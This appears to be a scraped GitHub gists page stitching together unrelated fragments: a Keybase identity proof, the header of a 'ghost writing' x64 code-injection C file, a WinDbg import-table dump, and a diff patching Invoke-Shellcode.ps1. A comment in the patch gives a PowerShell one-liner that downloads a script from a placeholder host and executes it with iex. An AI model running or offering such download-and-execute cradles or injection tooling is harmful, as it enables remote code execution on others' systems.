I hereby claim:
- I am hatRiot on github.
- I am droner (https://keybase.io/droner) on keybase.
- I have a public key whose fingerprint is B6F4 7EF5 4F44 CC36 1731 60E1 13A4 51C8 439D 800A
To claim this, I am signing this object:
/* | |
simple x64 implementation of the ghost writing code injection technique. note this is JUST FOR REFERENCE and won't | |
work in your sweet new c2 off the shelf. it also uses capstone. check out pinjectra for a more feature rich and stable version of this. | |
*/ | |
#include "stdafx.h" | |
#include <Windows.h> | |
#include "include/capstone/capstone.h" | |
#pragma comment(lib, "capstone.lib") |
0:023:x86> dt _IMAGE_IMPORT_DESCRIPTOR 0x40000+0x91d0+0n40 | |
ole32!_IMAGE_IMPORT_DESCRIPTOR | |
+0x000 Characteristics : 0x9290 | |
+0x000 OriginalFirstThunk : 0x9290 | |
+0x004 TimeDateStamp : 0 | |
+0x008 ForwarderChain : 0 | |
+0x00c Name : 0x99be | |
+0x010 FirstThunk : 0x900c | |
0:023:x86> da 0x40000+0x99be | |
000499be "KERNEL32.dll" |
I hereby claim:
To claim this, I am signing this object:
# apply to Invoke-Shellcode.ps1 | |
# invoke with: | |
# PS > $wc = New-Object Net.WebClient ; $wc.UseDefaultCredentials = $true; $wc.Proxy.Credentials = $wc.Credentials ; iex $wc.DownloadString("http://host/Invoke-Shellcode.ps1") | |
596,599c596 | |
< | |
< $proxy = [System.Net.WebRequest]::GetSystemWebProxy() | |
< $proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials | |
< | |
--- |